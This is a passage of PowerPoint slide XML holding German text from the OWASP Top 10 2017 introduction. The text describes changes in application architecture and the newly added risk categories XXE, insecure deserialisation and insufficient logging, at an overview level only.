                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>und die Referenzen zu aktuellen Frameworks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und Programmiersprachen angepasst.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In den letzten Jahren</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> hat sich die eingesetzte Technologie und Architektur von Anwendungen signifikant geändert:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices, die in node.js und Spring Boot geschrieben werden, ersetzen traditionelle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> monolithische Anwendungen.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Micro-services bringen neue Herausforderungen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> an die IT-Sicherheit mit, wie z.B. Vertrauensbeziehungen zwischen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ontainern und das Management der Anmeldedaten. Alter Code, der nie dafür geschrieben wurde, aus dem Internet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> erreichbar zu sein, wird nun via APIs oder </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RESTful</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Web-Service </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nach außen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> geöffnet, z.B. mittels </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Single-Page-Anwendungen (SPA) oder für mobile Apps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Architekturelle Annahmen für den Code, wie z.B. vertrauenswürdige Nutzer, sind nicht mehr gültig.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Single-Page-Anwendungen, die in JavaScript-Frameworks,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> wie z.B. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angular oder </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> geschrieben wurden, unterstützen die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Entwicklung von sehr modularen Clients mit einem großen Funktionsumfang. Das Verlagern von Funktionen auf den Client, die traditionell auf dem Server lagen, erzeugt weitere Herausforderungen für die IT-Sicherheit.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript ist inzwischen die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> meistgenutzte Sprache im Web, mit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>node.js auf den Servern und modernen Web-Frameworks wie Bootstrap, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Electron</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, Angular oder </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> auf dem Client. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="500"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neue Risiken, auf Basis der Datenerhebung:</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Entities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ist eine neue Kategorie,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>die hauptsächlich per </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Source-Code-Analyse-Sicherheits-Test-Tools</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> gefunden wurde. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="500"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risiken, auf Basis der Expertenumfrage in der Community</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wir haben die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Community gebeten, zwei Risiken zu wählen, die zukünftig von größerer Bedeutung sein werden. Aufgrund der Ergebnisse der Expertenumfrage mit über </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>500 Einsendungen wurden nach dem Streichen von Risiken, die bereits aufgrund</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> der Datenerhebung enthalten waren </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(z.B. Verlust der Vertraulichkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> sensibler Daten und XXE), folgende Risiken aufgenommen:</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Unsichere Deserialisierung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, die ein externes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Ausführen von beliebigem Code und die Manipulation von sensiblen Daten-Objekten auf betroffenen Plattformen ermöglicht.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Unzureichendes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
